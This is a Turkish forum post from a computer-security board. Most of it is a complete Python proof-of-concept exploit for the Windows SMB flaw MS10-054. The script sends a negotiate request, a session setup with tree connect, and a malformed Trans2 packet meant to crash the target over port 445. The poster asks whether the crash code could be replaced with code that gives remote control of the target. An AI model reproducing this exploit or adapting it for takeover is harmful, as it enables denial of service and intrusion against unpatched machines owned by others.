folder

Tahribat.com Forumları
line

line

folder

Bilişim Güvenliği
line

line

Bu Exploit Remote İçin Kullanılabilinirmi ?

Bu Exploit Remote İçin Kullanılabilinirmi ?

13/Ara/10 22:24

Kısayol

Şikayet

Özel Mesaj

Mx0TBT

Kayıt Tarihi: 13/Haziran/2007

hedefe saldırıyoruz ve kapanmasını sağlıyoruz buraya kadar tamam

peki kapatmasını sağlayan kod yerine kontrol için kod ekleyip hadef i kontrol edebilirmiyiz ?

#!/usr/bin/env python

`import` `sys,struct,socket`
`from` `socket import` `*`


`if` `len(sys.argv)<=2:`

`print` `'#######################################################################'`
`print` `'# MS10-054 Proof Of Concept by Laurent Gaffie'`

`print` `'# Usage: python '+sys.argv[0]+' TARGET SHARE-NAME (No backslash)'`
`print` `'# Example: python '+sys.argv[0]+' 192.168.8.101 users'`

`print` `'# http://g-laurent.blogspot.com/'`
`print` `'# http://twitter.com/laurentgaffie'`

`print` `'# Email: laurent.gaffie{at}gmail{dot}com'`
`print` `'#######################################################################\n\n'`

`sys.exit()`

`host =` `str(sys.argv[1]),445`

`packetnego =` `"\x00\x00\x00\x9a"`
`packetnego +=` `"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"`

packetnego += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x15\x00\x00\x01\x3d"

packetnego += "\x00\x77\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"

packetnego += "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4d\x49\x43\x52"

packetnego += "\x4f\x53\x4f\x46\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x33"

packetnego += "\x2e\x30\x00\x02\x44\x4f\x53\x20\x4c\x4d\x31\x2e\x32\x58\x30\x30"

packetnego += "\x32\x00\x02\x44\x4f\x53\x20\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31"

packetnego += "\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f"

packetnego += "\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4e"

`packetnego +=` `"\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"`

`def` `tidpiduidfield(data):`
`all_=data[28:34]`

`return` `all_`

`def` `handle(data):`
`##Chained SMB commands; Session Setup AndX Request,Tree connect`

`if` `data[8:10] ==` `"\x72\x00":`
`sharename =` `"\x00\x00\x5c\x5c\x5c"+str(sys.argv[2])+"\x00\x3f\x3f\x3f\x3f\x3f\x00"`

packetsession = "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"

packetsession += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd5\x15\x01\x00\x81\x2f"

packetsession += "\x0d\x75\x00\x7a\x00\x68\x0b\x32\x00\x00\x00\x00\x00\x00\x00\x18"

packetsession += "\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x3d\x00\x01\x01\x01"

packetsession += "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"

packetsession += "\x01\x01\x01\x01\x01\x59\x4f\x00\x57\x4f\x52\x4b\x47\x52\x4f\x55"

packetsession += "\x50\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x57\x69"

packetsession += "\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x04\xff\x00\x00\x00\x00"

`packetsession +=` `"\x00\x01\x00"+struct.pack(">i", len(sharename))[3:4]+sharename`
`print` `"[+]Session Query sent"`

`return` `struct.pack(">i", len(packetsession))+packetsession`

`##Trans2, Request, QUERY_FS_INFO Query FS Attribute Info`
`if` `data[8:10] ==` `"\x73\x00":`

`packetrans =` `"\x00\x00\x00\x46"`
`packetrans +=` `"\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x01\xc8\x00\x00\x00\x00"`

packetrans += "\x00\x00\x00\x00\x00\x00\x00\x00"+tidpiduidfield(data)+"\x13\x00"

packetrans += "\x0f\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

`packetrans +=` `"\x00\x00\x00\x02\x00\x44\x00\x00\x00\x46\x00\x01\x00\x03\x00\x05"`
`packetrans +=` `"\x00\x00\x44\x20\x05\x01"`

`print` `"[+]Malformed Trans2 packet sent\n[+]The target should be down now"`
`return` `packetrans`


`def` `run():`

`s =` `socket(AF_INET, SOCK_STREAM)`
`s.connect(host)`

`s.settimeout(2)`
`s.send(packetnego)`

`print` `"[+]Negotiate Protocol Request sent"`
`try:`

`while` `True:`
`data =` `s.recv(1024)`

`s.send(handle(data))`
`except` `Exception:`

`pass`
`s.close()`

run()

Ölümlü dünya. Yasin 38. Ayet

Toplam Hit: 11181 Toplam Mesaj: 1

Cevapla